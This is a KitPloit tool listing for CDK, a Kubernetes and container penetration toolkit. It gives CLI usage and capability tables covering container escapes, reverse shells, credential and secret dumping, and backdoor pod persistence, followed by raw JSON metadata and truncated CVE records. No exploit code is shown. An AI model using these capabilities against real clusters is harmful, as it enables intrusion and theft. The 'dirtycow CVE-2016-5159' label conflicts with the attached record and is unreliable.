CDK - Zero Dependency Container Penetration Toolkit
2021-01-21T11:30:06
ID KITPLOIT:1751489026679880812 Type kitploit Reporter KitPloit Modified 2021-01-21T11:30:06
Description
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs helps you to escape container and takeover K8s cluster easily.
Currently still under development, submit issues or mail [email protected] if you need any help.
Drop executable files into target container and start testing.
Usage
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk auto-escape <cmd>
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
Options:
-h --help Show this help msg.
-v --version Show version.
Features
CDK have three modules:
Evaluate: gather information inside container to find potential weakness.
Exploit: for container escaping, persistance and lateral movement
Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.
Evaluate Module
Usage
cdk evaluate [--full]
This command will run the scripts below without local file scanning, using --full to enable all.
Tactics | Script | Supported | Usage/Example
---|---|---|---
Information Gathering | OS Basic Info |
✔
| link
Information Gathering | Available Capabilities |
✔
| link
Information Gathering | Available Linux Commands |
{"id": "KITPLOIT:1751489026679880812", "bulletinFamily": "tools", "title": "CDK - Zero Dependency Container Penetration Toolkit", "description": "[  ](<https://1.bp.blogspot.com/-2lJSZ4nVz7c/YAZqglkVwBI/AAAAAAAAVCY/B20ZGieRBygx-iFXzmO6t4YKqS_I8eNXQCNcBGAsYHQ/s1000/h.jpg>)\n\n \n\n\nCDK is an open-sourced container penetration toolkit, designed for offering stable [ exploitation ](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) in different slimmed [ containers ](<https://www.kitploit.com/search/label/Containers> \"containers\" ) without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs helps you to escape container and takeover K8s cluster easily. \n\nCurrently still under development, submit [ issues ](<https://github.com/cdk-team/CDK/issues> \"issues\" ) or mail [email protected] if you need any help. \n\n \n\n\n** Installation ** \n\n\nDownload latest release in: [ https://github.com/cdk-team/CDK/releases/ ](<https://github.com/cdk-team/CDK/releases/> \"https://github.com/cdk-team/CDK/releases/\" )\n\nDrop executable files into target container and start testing. \n\n \n** Usage ** \n\n \n \n Usage: \n cdk evaluate [--full] \n cdk run (--list | <exploit> [<args>...]) \n cdk auto-escape <cmd> \n cdk <tool> [<args>...] \n \n Evaluate: \n cdk evaluate Gather information to find weakness inside container. \n cdk evaluate --full Enable file scan during information gathering. \n \n Exploit: \n cdk run --list List all available exploits. \n cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki \n \n Auto Escape: \n cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>. \n \n Tool: \n vi <file> Edit files in container like \"vi\" command. \n ps Show process information like \"ps -ef\" command. \n nc [options] Create TCP tunnel. \n ifconfig Show network information. \n kcurl <path> (get|post) <uri> <data> Make request to K8s api-server. \n ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket. \n probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000 \n \n Options: \n -h --help Show this help msg. \n -v --version Show version. \n \n\n \n** Features ** \n\n\nCDK have three modules: \n\n 1. Evaluate: gather information inside container to find potential weakness. \n 2. Exploit: for container escaping, persistance and lateral movement \n 3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management. \n \n** Evaluate Module ** \n\n\nUsage \n \n \n cdk evaluate [--full] \n \n\nThis command will run the scripts below without local file scanning, using ` --full ` to enable all. \n\nTactics | Script | Supported | Usage/Example \n---|---|---|--- \nInformation Gathering | OS Basic Info | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-System-Info> \"link\" ) \nInformation Gathering | Available Capabilities | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities> \"link\" ) \nInformation Gathering | Available Linux Commands | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities> \"link\" ) \nInformation Gathering | Mounts | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Mounts> \"link\" ) \nInformation Gathering | Net Namespace | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Net-Namespace> \"link\" ) \nInformation Gathering | Sensitive ENV | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Services> \"link\" ) \nInformation Gathering | Sensitive Process | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Services> \"link\" ) \nInformation Gathering | Sensitive Local Files | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files> \"link\" ) \nDiscovery | K8s Api-server Info | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server> \"link\" ) \nDiscovery | K8s Service-account Info | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account> \"link\" ) \nDiscovery | Cloud Provider [ Metadata ](<https://www.kitploit.com/search/label/Metadata> \"Metadata\" ) API | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API> \"link\" ) \n \n** Exploit Module ** \n\n\nList all available exploits: \n \n \n cdk run --list \n \n\nRun targeted exploit: \n \n \n cdk run <script-name> [options] \n \n\nTactic | Technique | CDK Exploit Name | Supported | Doc \n---|---|---|---|--- \nEscaping | docker-runc CVE-2019-5736 | runc-pwn | \n\n\u2714 \n\n| \nEscaping | docker-cp CVE-2019-14271 | | | \nEscaping | containerd-shim CVE-2020-15257 | shim-pwn | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn> \"link\" ) \nEscaping | dirtycow CVE-2016-5159 | | | \nEscaping | docker.sock PoC (DIND attack) | docker-sock-check | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check> \"link\" ) \nEscaping | docker.sock [ Backdoor ](<https://www.kitploit.com/search/label/Backdoor> \"Backdoor\" ) Image Deploy | docker-sock-deploy | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy> \"link\" ) \nEscaping | Device Mount Escaping | mount-disk | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk> \"link\" ) \nEscaping | Cgroups Escaping | mount-cgroup | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup> \"link\" ) \nEscaping | Procfs Escaping | mount-procfs | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs> \"link\" ) \nEscaping | Ptrace Escaping PoC | check-ptrace | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace> \"link\" ) \nDiscovery | K8s Component Probe | service-probe | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe> \"link\" ) \nDiscovery | Dump Istio Sidecar Meta | istio-check | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio> \"link\" ) \nLateral Movement | K8s Service Account Control | | | \nLateral Movement | Attack K8s api-server | | | \nLateral Movement | Attack K8s Kubelet | | | \nLateral Movement | Attack K8s Dashboard | | | \nLateral Movement | Attack K8s Helm | | | \nLateral Movement | Attack K8s Etcd | | | \nLateral Movement | Attack Private Docker Registry | | | \nRemote Control | Reverse Shell | reverse-shell | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell> \"link\" ) \nCredential Access | Access Key Scanning | ak-leakage | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage> \"link\" ) \nCredential Access | Dump K8s Secrets | k8s-secret-dump | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump> \"link\" ) \nCredential Access | Dump K8s Config | k8s-configmap-dump | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump> \"link\" ) \nPersistence | Deploy WebShell | | | \nPersistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset> \"link\" ) \nPersistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver> \"link\" ) \nPersistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip> \"link\" ) \nPersistence | Deploy K8s CronJob | | | \nDefense Evasion | Disable K8s Audit | | | \n \n** Tool Module ** \n\n\nRunning commands like in Linux, little different in input-args, see the usage link. \n \n \n cdk nc [options] \n cdk ps \n \n\nCommand | Description | Supported | Usage/Example \n---|---|---|--- \nnc | TCP Tunnel | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-nc> \"link\" ) \nps | Process Information | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-ps> \"link\" ) \nifconfig | Network Information | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig> \"link\" ) \nvi | Edit Files | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-vi> \"link\" ) \nkcurl | Request to K8s api-server | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-kcurl> \"link\" ) \ndcurl | Request to Docker HTTP API | | \nucurl | Request to Docker Unix Socket | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-ucurl> \"link\" ) \nrcurl | Request to Docker Registry API | | \nprobe | IP/Port Scanning | \n\n\u2714 \n\n| [ link ](<https://github.com/cdk-team/CDK/wiki/Tool:-probe> \"link\" ) \n \n** Developer Docs ** \n\n\n * [ run test in container. ](<https://github.com/cdk-team/CDK/wiki/Run-Test> \"run test in container.\" )\n \n** TODO ** \n\n\n 1. Echo loader for delivering CDK into target container via Web RCE. \n 2. EDR defense evasion. \n 3. Compile optimization. \n 4. Dev docs \n \n \n\n\n** [ Download CDK ](<https://github.com/cdk-team/CDK> \"Download CDK\" ) **\n", "published": "2021-01-21T11:30:06", "modified": "2021-01-21T11:30:06", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://www.kitploit.com/2021/01/cdk-zero-dependency-container.html", "reporter": "KitPloit", "references": ["https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs", "https://github.com/cdk-team/CDK/wiki/Tool:-ucurl", "https://github.com/cdk-team/CDK/wiki/Tool:-vi", "https://github.com/cdk-team/CDK", "https://github.com/cdk-team/CDK/wiki/Evaluate:-Services", "https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset", "https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy", "https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell", "https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip", "https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage", "https://github.com/cdk-team/CDK/releases/", "https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account", "https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check", "https://github.com/cdk-team/CDK/wiki/Run-Test", "https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio", "https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig", "https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup", "https://github.com/cdk-team/CDK/wiki/Tool:-probe", "https://github.com/cdk-team/CDK/wiki/Tool:-nc", "https://github.com/cdk-team/CDK/wiki/Tool:-ps", "https://github.com/cdk-team/CDK/wiki/Evaluate:-Net-Namespace", "https://github.com/cdk-team/CDK/issues", "https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver", "https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk", "https://github.com/cdk-team/CDK/wiki/Evaluate:-System-Info", "https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files", "https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe", "https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities", "https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn", "https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump", "https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump", "https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server", "https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API", "https://github.com/cdk-team/CDK/wiki/Evaluate:-Mounts", "https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace", "https://github.com/cdk-team/CDK/wiki/Tool:-kcurl"], "cvelist": ["CVE-2020-8554", "CVE-2020-15257", "CVE-2019-14271", "CVE-2019-5736", "CVE-2016-5159"], "type": "kitploit", "lastseen": "2021-01-21T17:50:49", "edition": 1, "viewCount": 68, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-5736", "CVE-2020-15257", "CVE-2020-8554", "CVE-2019-14271", "CVE-2016-5159"]}, {"type": "symantec", "idList": ["SMNTC-111109"]}, {"type": "f5", "idList": ["F5:K46421255"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC"]}, {"type": "hackerone", "idList": ["H1:495495"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2021-1", "OPENSUSE-SU-2019:2245-1", "OPENSUSE-SU-2019:0252-1", "OPENSUSE-SU-2019:0201-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310852679", "OPENVAS:1361412562310876772", "OPENVAS:1361412562310875706", "OPENVAS:1361412562310876768", "OPENVAS:1361412562310875467", "OPENVAS:1361412562310876762", "OPENVAS:1361412562310142683", "OPENVAS:1361412562310852826", "OPENVAS:1361412562310875688", "OPENVAS:1361412562310875806"]}, {"type": "nessus", "idList": ["SUSE_SU-2019-2117-1.NASL", "FEDORA_2020-BAEB8DBAEA.NASL", "ORACLELINUX_ELSA-2020-5964.NASL", "PHOTONOS_PHSA-2019-2_0-0193_DOCKER.NASL", "PHOTONOS_PHSA-2020-2_0-0301_CONTAINERD.NASL", "OPENSUSE-2019-2021.NASL", "ORACLELINUX_ELSA-2020-5966.NASL", "PHOTONOS_PHSA-2020-3_0-0168_CONTAINERD.NASL", "UBUNTU_USN-4653-2.NASL", "ALA_ALAS-2020-1455.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5964", "ELSA-2019-0975", "ELSA-2019-4827", "ELSA-2020-5966"]}, {"type": "archlinux", "idList": ["ASA-202012-8", "ASA-201902-6"]}, {"type": "ubuntu", "idList": ["USN-4653-1"]}, {"type": "amazon", "idList": ["ALAS-2019-1156", "ALAS-2020-1455"]}, {"type": "fedora", "idList": ["FEDORA:1D3BD6049C24", "FEDORA:7FBE46071258", "FEDORA:421346101A44", "FEDORA:3A64160C815D", "FEDORA:D35EC607603A", "FEDORA:1308F60C4220", "FEDORA:E3C59624D00E", "FEDORA:3E17230B6FC0", "FEDORA:B42946075886", "FEDORA:0907F624D00F"]}, {"type": "vmware", "idList": ["VMSA-2019-0001"]}, {"type": "thn", "idList": ["THN:B0FC327500C590C565FC4F46D8DCDD34"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11"]}, {"type": "cisco", "idList": ["CISCO-SA-20190215-RUNC"]}, {"type": "redhat", "idList": ["RHSA-2019:0975", "RHSA-2019:0401", "RHSA-2019:0303", "RHSA-2019:0304", "RHSA-2019:0408"]}, {"type": "zdt", "idList": ["1337DAY-ID-32165", "1337DAY-ID-32182"]}, {"type": "virtuozzo", "idList": ["VZA-2019-008"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465"]}, {"type": "threatpost", "idList": ["THREATPOST:B4C48A638705549FED64000361BA8526"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB"]}, {"type": "exploitdb", "idList": ["EDB-ID:46359", "EDB-ID:46369"]}], "modified": "2021-01-21T17:50:49", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-01-21T17:50:49", "rev": 2}, "vulnersScore": 6.1}, "toolHref": "https://github.com/cdk-team/CDK"}
{"cve": [{"lastseen": "2021-02-02T07:12:51", "description": "In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-29T18:15:00", "title": "CVE-2019-14271", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14271"], "modified": "2019-08-28T13:15:00", "cpe": [], "id": "CVE-2019-14271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14271", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T07:37:00", "description": "containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim\u2019s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. This vulnerability has been fixed in containerd 1.3.9 and 1.4.3. Users should update to these versions as soon as they are released. It should be noted that containers started with an old version of containerd-shim should be stopped and restarted, as running containers will continue to be vulnerable even after an upgrade. If you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the \"host\" network namespace, for example with docker run --net=host or hostNetwork: true in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue. If you are running containers with a vulnerable configuration, you can deny access to all abstract sockets with AppArmor by adding a line similar to deny unix addr=@**, to your policy. It is best practice to run containers with a reduced set of privileges, with a non-zero UID, and with isolated namespaces. The containerd maintainers strongly advise against sharing namespaces with the host. Reducing the set of isolation mechanisms used for a container necessarily increases that container's privilege, regardless of what container runtime is used for running that container.", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-12-01T03:15:00", "title": "CVE-2020-15257", "type": "cve", "cwe": ["CWE-669"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15257"], "modified": "2020-12-10T03:15:00", "cpe": [], "id": "CVE-2020-15257", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-15257", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-04T14:27:56", "description": "Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.externalIPs field, to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to users) of a LoadBalancer service can set the status.loadBalancer.ingress.ip to similar effect.", "edition": 6, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 5.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.4}, "published": "2021-01-21T17:15:00", "title": "CVE-2020-8554", "type": "cve", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8554"], "modified": "2021-02-04T01:15:00", "cpe": ["cpe:/a:kubernetes:kubernetes:*"], "id": "CVE-2020-8554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8554", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "Multiple integer overflows in OpenJPEG, as used in PDFium in Google Chrome before 53.0.2785.89 on Windows and OS X and before 53.0.2785.92 on Linux, allow remote attackers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted JPEG 2000 data that is mishandled during opj_aligned_malloc calls in dwt.c and t1.c.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-11T10:59:00", "title": "CVE-2016-5159", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5159"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:google:chrome:52.0.2743.116", "cpe:/o:opensuse:leap:42.1"], "id": "CVE-2016-5159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:52.0.2743.116:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:13:02", "description": "runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.", "edition": 26, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-02-11T19:29:00", "title": "CVE-2019-5736", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5736"], "modified": "2020-11-16T20:46:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:hci_management_node:-", "cpe:/o:fedoraproject:fedora:29", "cpe:/a:redhat:container_development_kit:3.7", "cpe:/o:fedoraproject:fedora:30", "cpe:/a:microfocus:service_management_automation:2018.02", "cpe:/o:opensuse:leap:15.1", "cpe:/a:microfocus:service_management_automation:2018.05", "cpe:/a:linuxfoundation:runc:0.1.1", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:opensuse:leap:42.3", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:microfocus:service_management_automation:2018.08", "cpe:/o:canonical:ubuntu_linux:19.04", "cpe:/a:netapp:solidfire:-", "cpe:/a:linuxfoundation:runc:1.0.0", "cpe:/a:redhat:openshift:3.6", "cpe:/a:google:kubernetes_engine:-", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:redhat:enterprise_linux:8.0", "cpe:/a:redhat:openshift:3.5", "cpe:/a:redhat:openshift:3.4", "cpe:/a:redhat:openshift:3.7", "cpe:/a:microfocus:service_management_automation:2018.11", "cpe:/a:hp:onesphere:-"], "id": "CVE-2019-5736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:0.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "cpe:2.3:a:google:kubernetes_engine:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", 